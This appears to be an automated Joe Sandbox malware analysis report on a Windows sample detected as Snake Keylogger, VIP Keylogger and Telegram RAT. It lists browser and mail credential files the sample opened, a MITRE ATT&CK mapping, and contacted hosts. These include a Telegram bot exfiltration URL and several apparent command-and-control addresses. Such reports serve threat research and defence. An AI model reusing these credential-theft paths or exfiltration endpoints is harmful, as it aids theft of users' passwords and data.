Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\lkETeneRL3.exe

1_2_0040322B

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7376, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000006.00000002.2582989409.0000000021733000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7376, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7376, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000006.00000002.2582989409.0000000021733000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lkETeneRL3.exe	58%	ReversingLabs	Win32.Trojan.Leonem
lkETeneRL3.exe	72%	Virustotal		Browse
lkETeneRL3.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsv37AB.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://mail.jovannovicvoce.com	0%	Avira URL Cloud	safe
http://crl.micros0s	0%	Avira URL Cloud	safe
http://jovannovicvoce.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	216.58.206.78	true	false	high
drive.usercontent.google.com	142.250.185.129	true	false	high
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
jovannovicvoce.com	151.80.4.227	true	false	unknown
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high
mail.jovannovicvoce.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2011/01/2025%20/%2014:41:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 00000006.00000002.2582989409.0000000021708000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	false		high
http://jovannovicvoce.com	msiexec.exe, 00000006.00000002.2582989409.0000000021743000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	msiexec.exe, 00000006.00000002.2582989409.0000000021703000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000003.2029301268.0000000005B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2571166277.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 00000006.00000002.2582989409.00000000215FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros0s	msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2029301268.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	lkETeneRL3.exe	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000006.00000002.2582989409.00000000216D7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.0000000021708000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft.	msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	lkETeneRL3.exe	false		high
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000006.00000002.2582989409.0000000021733000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000006.00000002.2571166277.0000000005AEA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a	msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000006.00000002.2582989409.00000000216D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000215FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000215B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000215FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.000000002158D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.jovannovicvoce.com	msiexec.exe, 00000006.00000002.2582989409.0000000021743000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.0000000021733000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.2582989409.000000002158D000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.185.129	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
216.58.206.78	drive.google.com	United States	15169	GOOGLEUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
151.80.4.227	jovannovicvoce.com	Italy	16276	OVHFR	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588867
Start date and time:	2025-01-11 06:29:23 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lkETeneRL3.exe renamed because original name is a hash value
Original Sample Name:	f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/14@6/6
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 84 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7376 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:30:25	API Interceptor	38x Sleep call for process: powershell.exe modified
02:06:51	API Interceptor	21270x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse
104.21.112.1	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/qzi3/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
158.101.44.242	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
